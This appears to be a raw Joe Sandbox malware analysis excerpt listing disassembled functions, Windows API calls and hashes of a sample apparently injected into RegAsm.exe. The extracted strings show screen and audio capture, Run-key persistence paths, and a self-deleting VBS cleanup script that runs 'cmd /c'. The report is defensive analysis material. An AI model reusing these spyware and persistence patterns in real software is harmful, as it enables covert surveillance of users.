                                                                                • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                                Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                • String ID:
                                                                                • API String ID: 1663032902-0
                                                                                • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                                • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                                Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                                • String ID:
                                                                                • API String ID: 2692324296-0
                                                                                • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                                • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                                Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                • String ID:
                                                                                • API String ID: 1272433827-0
                                                                                • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                                • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                                Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                • String ID:
                                                                                • API String ID: 1084509184-0
                                                                                • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                                • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                                Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                Function 00418EB1 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                • GetCursorInfo.USER32(?), ref: 00418FE2
                                                                                • GetIconInfo.USER32 ref: 00418FF8
                                                                                • DeleteObject.GDI32(?), ref: 00419027
                                                                                • DeleteObject.GDI32(?), ref: 00419034
                                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                • DeleteDC.GDI32(?), ref: 004191B7
                                                                                • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                • DeleteDC.GDI32(?), ref: 00419293
                                                                                • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                • String ID: DISPLAY
                                                                                • API String ID: 4256916514-865373369
                                                                                • Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                                • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                                • Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                                • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                                Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,34,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                • API String ID: 1861856835-1447701601
                                                                                • Opcode ID: 75411c661804942ac0c20cae05e5ac0352ee264e9c2b8d2bcec38419829fb2c2
                                                                                • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                                • Opcode Fuzzy Hash: 75411c661804942ac0c20cae05e5ac0352ee264e9c2b8d2bcec38419829fb2c2
                                                                                • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                                Function 0040D0D1 Relevance: 44.0, APIs: 6, Strings: 19, Instructions: 260registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,34,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63881986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                • ExitProcess.KERNEL32 ref: 0040D454
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF$34
                                                                                • API String ID: 3797177996-4287197192
                                                                                • Opcode ID: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                                                                • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                                                • Opcode Fuzzy Hash: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                                                                • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                                                Function 004124B0 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,p54,00000003), ref: 004124CF
                                                                                • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                • lstrcatW.KERNEL32 ref: 0041263C
                                                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                • String ID: .exe$8SG$WDH$exepath$open$p54$temp_
                                                                                • API String ID: 2649220323-2651630017
                                                                                • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                                • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                                • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                                • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                                Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                • API String ID: 738084811-2094122233
                                                                                • Opcode ID: 37c87ac249c428bde8a6397484934752c0f6273a1b33c710f4a725e2a1bf7a07
                                                                                • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                                • Opcode Fuzzy Hash: 37c87ac249c428bde8a6397484934752c0f6273a1b33c710f4a725e2a1bf7a07
                                                                                • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                                Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Write$Create
                                                                                • String ID: RIFF$WAVE$data$fmt
                                                                                • API String ID: 1602526932-4212202414
                                                                                • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                                • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                                Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,34,00407709), ref: 004072BF
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                • API String ID: 1646373207-255920310
                                                                                • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
